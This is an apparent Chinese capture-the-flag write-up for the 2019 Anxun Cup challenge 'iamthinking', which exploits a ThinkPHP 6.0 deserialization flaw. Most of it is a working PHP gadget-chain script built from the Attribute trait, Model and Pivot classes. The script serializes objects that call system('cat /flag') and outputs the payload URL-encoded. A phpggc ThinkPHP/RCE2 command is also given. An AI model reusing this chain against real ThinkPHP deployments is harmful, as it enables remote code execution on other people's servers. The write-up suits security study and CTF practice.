[安洵杯 2019]iamthinking

1

dirsearch搜集到www.zip文件:

发现是thinkphp6.0版本:

thinkphp6.0有两个计较明显的漏洞:
一个文件上传:要开启session(本题没开)

一个就是反序列化:本体有个unserilize函数

那就是反序列化了

php脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<?php
 
namespace think\model\concern;
 
trait Attribute
{
    private $data = ["key" => ["key1" => "cat /flag"]];
    private $withAttr = ["key"=>["key1"=>"system"]];
    protected $json = ["key"];
}
namespace think;
 
abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    protected $jsonAssoc;
    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->table = $obj;
        $this->jsonAssoc = true;
    }
}
 
namespace think\model;
 
use think\Model;
 
class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);
$c = array($b);
echo urlencode(serialize($c));

phpgcc好像搞不了(首字母不能是O,在

1
./phpggc -u ThinkPHP/RCE2 'system("cat /flag");'

出来的时候是O开头)

仔细的反序列化过程:https://xz.aliyun.com/t/6479?u_atoken=e1983cca7115bb73dc8261395f38e428&u_asig=1a0c399a17270782535993477e0035